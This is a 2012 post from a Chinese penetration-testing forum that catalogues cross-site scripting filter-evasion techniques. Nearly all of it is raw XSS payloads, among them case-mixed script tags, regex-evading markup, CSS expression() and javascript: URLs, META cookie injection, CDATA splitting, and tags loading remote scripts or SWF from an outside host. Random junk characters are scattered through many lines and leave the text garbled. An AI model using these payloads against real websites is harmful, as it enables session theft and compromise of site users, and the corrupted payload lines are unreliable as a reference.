中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
. j) V$ E  u4 X  |, C
% ?6 m$ d9 t$ S( w. _
. C. C$ |4 Z' W9 q5 o% o5 k1 x! ^+ n% ?7 u
    <sCript>alert(‘d’)</scRipT>
/ L* q# ?- q! w# E' @! X: _. W4 u6 |* {" d1 z8 O
2. 利用多加一些其它字符来规避Regular Expression的检查. p( y3 @% H  R* N$ i" W# f
( \% o; j% T) A0 d% m- M2 D
    <<script>alert(‘c’)//<</script>7 j8 c8 h  ]" y% d3 z' P
2 Q$ ]5 Z- y  z8 P2 f% h) m9 u5 z  i
    <SCRIPT a=">" SRC="t.js"></SCRIPT>; \* y! r, o+ m4 g) Q
( q0 G% |* U- [6 c8 i. W
    <SCRIPT =">" SRC="t.js"></SCRIPT>% E; D7 q9 `' ~6 f( X
  G0 }: B' w# T; [6 h5 X0 x
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>4 K$ ]; z6 P$ _; ^' D$ R1 P

8 c( T3 ]1 i2 x$ _# V    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
( s" C& j% ^' ^- h2 C
) @5 m5 F5 _3 \, h% C! m    <SCRIPT a=`>` SRC="t.js"></SCRIPT>6 A; K  w1 T$ E5 O
$ s8 j3 ?! ?) v. z
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
: t! M7 _% S: r8 u1 [2 N' N) v& F5 n" h
- a, U6 v  s5 L0 |3. 以其它扩展名取代.js5 w" b9 u6 f, y- I( N) v9 S
; k" o' i6 P* Y2 n
    <script src="bad.jpg"></script>
; ?: |  ]7 N  S6 O6 _: i/ M$ x* Q5 e& X5 u% M
4. 将Javascript写在CSS档里% Z. U, g" o" `( U
2 V4 U7 Q- V" \' S4 G
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
7 ~& u; E6 s; d3 I# q
; e9 l; A) O2 A; S  N& s0 U! F       example:
' e, y# Z5 `4 e5 k
* l: W. l, o) V3 g, A' k          body {
- y; i5 p- d' o. y, z: I
( n) [+ Q, Z' a- x* x  N1 V               background-image: url(‘javascript:alert("XSS");’)
' H) a; d, N. F- `; C
6 g* u9 L2 g5 I          }
; h) _5 S' M9 k& A0 z" c* P( @* k: U8 Q2 W8 `# R
5. 在script的tag里加入一些其它字符
% l9 t4 ?2 D4 l* k/ y! p# ?) U' Q
$ J; h! I( R" U- l! x! Z9 R1 p4 C1 y    <SCRIPT/SRC="t.js"></SCRIPT>
: I/ g% A& f; b, i2 _( t
, K7 ^6 v3 K3 I* J& p: E    <SCRIPT/anyword SRC="t.js"></SCRIPT>
! k0 Q) h7 Y# v( o2 K+ B/ R
1 }$ f6 n. G4 o8 V  g( T6. 使用tab或是new line来规避
, j' `$ x  P) y2 e1 `. |
4 G) }' ^$ t* O! H' n# y& g    <img src="jav ascr ipt:alert(‘XSS3′)">
; g8 i: Q6 i3 O% y+ N2 z1 P7 W8 C2 A. }! x# ]
    <img src="jav ascr ipt:alert(‘XSS3′)">
0 J# H% e: g5 }9 F4 K) j" k6 J% b% n. m; v6 r4 I
    <IMG SRC="jav ascript:alert(‘XSS’);">* Q, k7 u* p% ?: Y+ S& u

2 J) v, C: A4 {         -> tag' \3 W/ R# \2 c9 x
9 t' a4 g, V9 M, O
         -> new line, i+ J3 b" T( x1 K$ s" y# L& |# o
9 F9 {4 D: V1 u) c& F6 |
7. 使用"\"来规避5 e9 b5 \  P" O3 f  [: C0 J  v

+ c8 M0 V8 A$ w& t. g: `$ g    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>$ e. {+ ]; F+ X

4 d: g$ T. F3 ?( x  C    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>- W7 O- k, |- O( J. |; ~) Q& N/ B
% B* p3 \4 q/ p, E. R) ]) g. Z
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
  W" V$ w) H8 @  I3 x6 w  ?( C( i- ^
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
/ c- d, e, x. r4 p, P, k" S! A' q( R* R, T
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>$ [% \9 F) f1 i7 n' X2 f

- V. Y7 l9 T6 O8. 使用Hex encode来规避(也可能会把";"拿掉)% [9 T( c! x2 y0 a9 K
8 w8 r1 m4 A3 J0 G9 i; `
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: V' B; q  w$ v7 O5 |- g6 J
  J& E) s" G  k4 r  B; c
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
0 G* ~2 J% B5 z1 R
  {+ G. \% J/ N- ]) ^! ]( r$ Z    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( T" Q1 ]7 ]/ O3 U. l7 Z  b8 h3 `- B9 ~2 Q, t9 Q4 i
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">8 ?- p0 z( f( ]- }; Y% w
/ X: K  B5 w, C% B
9. script in HTML tag( o# n8 T; m6 P' k4 Y; i  D
5 c$ B/ h# E! M4 ~2 l6 a
    <body onload=」alert(‘onload’)」>- @( g8 d( s/ ]1 z' k$ Y! Y
9 h* S/ R% e% d& `) l
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload7 m* y: j- X  F$ Y( f5 M
2 g0 C; t9 ?( I. l7 @
10. 在swf里含有xss的code
4 A9 x9 O' C6 A9 T
2 [  q( j; W  F% {. v0 k    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>$ D0 _1 [5 @7 U- l

2 b3 B$ v8 [& j1 \. l3 }11. 利用CDATA将xss的code拆开,再组合起来。
/ E! Q2 F# `' C  I% J4 F* R2 M$ [% d
    <XML ID=I><X><C>
8 i' X4 O8 X% N' w( Y1 |3 j8 ?
9 _1 p- R+ h6 a! V; u# V    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>; E8 c0 F. m; h5 j
% A6 L7 }9 f+ h/ X& P- {9 O) {
    </C></X>6 S# t( l; L5 a! ~- G7 b
# a) b; B* C% t' ?8 M6 |6 A- _$ ^
    </xml>
* I: w8 y) O! U- l
3 y- r- K8 ?* C3 Z2 u$ \' h    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>$ a! i- T' K% W/ G; l  D4 A' d6 `
8 C& Q/ X: I' V2 a2 I" R% S# ~
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>. r* A4 ~: C. |5 T
. K9 L! @% J9 r3 E" H# e
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>% {# G6 ^3 f* ~1 q7 L% J
0 F" K/ h# |$ ?. `; }5 F% l3 D
12. 利用HTML+TIME。* ~  G$ T& E3 y5 e3 y# H

, @7 i9 Z! x0 F5 A    <HTML><BODY>
# R, D4 n: @0 k3 |% [! l3 x
" E+ w/ D0 @/ \- V    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
1 e% T& I: g5 H6 v; p3 Y
, u5 t. |$ w0 ^$ r4 k) E    <?import namespace="t" implementation="#default#time2">/ h0 t" w5 e2 `0 @3 z& Y. {# l
6 h1 w5 U# C: D9 g4 r" _
    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
9 l* z, l9 k/ F
, E1 S) w6 G1 B7 t- F& P" q    </BODY></HTML>
  i- u: N4 B+ W2 A8 a# r
8 `: [% i2 F# ~/ M# s13. 透过META写入Cookie。. ?# F5 o9 D) U) q4 A3 E

! T, N: ^/ v- B. p/ s: z4 J    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">- z0 X% G( |  z5 Z4 q) t/ j% ]* S
' A$ G$ w* v  H! b
14. javascript in src , href , url; k5 V9 G# X6 @. a& _
# _7 N5 ?3 i9 c7 R# t
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>9 }- L! m1 v" d: f! L* ?

0 @7 A8 q1 c9 ]- A    <img src="javascript:alert(‘XSS3′)">
$ J8 g! P# x: i# j8 }0 D0 I  Z+ C
: C" a' y, Q" f0 d* V5 y/ A5 ~<IMG DYNSRC="javascript:alert(‘XSS20′)">+ \) t6 t' O1 F/ i6 n* w

( M" c$ q, h% i' F% U0 E. j! N$ H    <IMG LOWSRC="javascript:alert(‘XSS21′)">
8 z3 j( W2 o% _8 g
+ @6 N+ P" b. F$ e( o; i6 [& C0 m  q    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
  P5 A" a! r3 C% u, Y( I/ w( U! q5 A8 Q' N
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>( ?. Q% }: i7 x$ q3 I& s5 F- I
& v  p) H/ k: t' Y# O2 ~8 r
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">1 \5 l& L/ D0 q, z

. d1 V# b1 G. D5 L3 B0 `    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">* Y0 ~! T% i4 I" t) `, o

" F: p+ V2 X( F    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
6 S! S- }7 c: @7 l# q6 G  F4 ?( u+ C6 ?
    </STYLE><A CLASS=XSS></A>
" a0 c& R9 I! v) L6 {) z3 c# [7 e9 d- q) [# W9 I8 X8 h8 `$ b8 l
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
# s: J& `4 n( s+ p& T7 A5 v7 [$ E4 E7 k  A




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2